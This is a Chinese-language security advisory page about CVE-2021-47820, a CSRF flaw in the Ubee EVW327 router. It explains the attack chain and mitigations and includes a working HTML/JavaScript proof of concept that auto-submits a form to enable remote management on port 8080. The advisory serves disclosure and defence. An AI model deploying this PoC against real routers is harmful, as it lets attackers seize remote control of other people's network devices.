IPBUF安全漏洞报告
English
CVE-2021-47820 CVSS 5.3 中危

CVE-2021-47820 Ubee EVW327 路由器CSRF漏洞允许远程访问劫持

披露日期: 2026-01-16

漏洞信息

漏洞编号
CVE-2021-47820
漏洞类型
跨站请求伪造(CSRF)
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Ubee EVW327 路由器

相关标签

CSRFUbee路由器远程访问CVE-2021-47820固件漏洞

漏洞概述

Ubee EVW327是一款由Ubee Interactive公司生产的无线路由器。该设备存在跨站请求伪造(CSRF)漏洞,攻击者可以利用此漏洞在未经用户同意的情况下,修改路由器的远程访问设置。攻击者只需诱使已登录的管理员访问恶意网页,即可自动将路由器的远程管理功能启用,并将端口设置为8080,从而实现对路由器的远程访问和控制。此漏洞无需任何认证凭证,攻击者即可利用成功。

技术细节

该CSRF漏洞存在于路由器的远程访问设置页面。攻击者可以构造包含自动提交表单的恶意HTML页面,当管理员访问时,浏览器会自动向路由器发送修改远程访问设置的POST请求。由于路由器缺乏对请求来源的验证机制,无法区分合法请求和恶意请求。攻击者通过JavaScript或HTML表单自动提交功能,实现无需用户交互的攻击。漏洞利用的关键在于利用浏览器会自动携带目标域Cookie的特性,以及路由器未实施CSRF令牌保护。

攻击链分析

STEP 1
步骤1
攻击者创建恶意网页,包含自动提交表单
STEP 2
步骤2
诱使已登录的管理员访问恶意网页
STEP 3
步骤3
浏览器自动发送POST请求修改远程访问设置
STEP 4
步骤4
路由器接收请求并启用远程访问功能
STEP 5
步骤5
攻击者通过端口8080远程访问路由器

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<html><body><h1>CSRF PoC - Enable Remote Access on Ubee EVW327</h1><script>document.write('<form action="http://192.168.0.1/remote_management.asp" method="POST" id="csrf">');document.write('<input type="hidden" name="remote_management" value="1">');document.write('<input type="hidden" name="port" value="8080">');document.write('</form>');document.getElementById('csrf').submit();</script></body></html>

影响范围

Ubee EVW327 所有版本

防御指南

临时缓解措施
在不使用远程管理功能时,禁用该功能;定期检查路由器设置,确保远程访问未被意外启用;使用浏览器扩展程序阻止自动表单提交;在受控网络环境中使用路由器。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表